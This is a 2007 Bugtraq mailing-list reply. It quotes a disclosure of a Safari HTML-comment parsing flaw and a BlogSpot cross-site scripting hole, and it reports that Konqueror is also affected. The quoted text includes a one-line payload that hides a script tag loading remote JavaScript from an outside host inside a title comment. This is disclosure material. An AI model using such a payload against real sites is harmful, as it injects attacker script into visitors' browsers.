[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <45B6E95A.7000807@greentech.pl>
Date: Wed, 24 Jan 2007 06:06:34 +0100
From: Robert Tasarz <robert.tasarz@...entech.pl>
To: bugtraq@...urityfocus.com
Subject: Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability
Jose Avila III wrote:
> Overview:
>
> Safari on occasions may improperly parse the source of an HTML document,
> which can lead to the execution of html tags within comments. This can
> become dangerous when input filters allow html tags within comments, as
> they will get parsed and executed under certain circumstances.
>
> Details:
>
> In some cases you can cause Appleās Safari browser to execute code when
> it should not be executed. In the following example everything within
> the comment, in theory should never be executed; however, safari decides
> to execute the script tag.
>
> <title>myblog<!--</title></head><body><script
> src=http://beanfuzz.com/bean.js> --></title>
>
> Blogs hosted on BlogSpot.com have filter mechanisms for their input;
> however, they will allow you to inject anything within comments. This
> made it possible to cross site script blogspot.com. Note: Only Safari
> viewers will be affected.
>
> Proof of concept: http://dirtybean1234.blogspot.com/
>
> Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99
>
> Vendor Response:
>
> I was unable to get a response from the vendor in regards to this issue
>
> Questions / Comments:
> Jose (at) onzra (dot) com
>
As could be expected, the same problem exists in Konqueror (tested
v.3.5.5 on Debian GNU/Linux Sid).
regards,
Robert Tasarz
Powered by blists - more mailing lists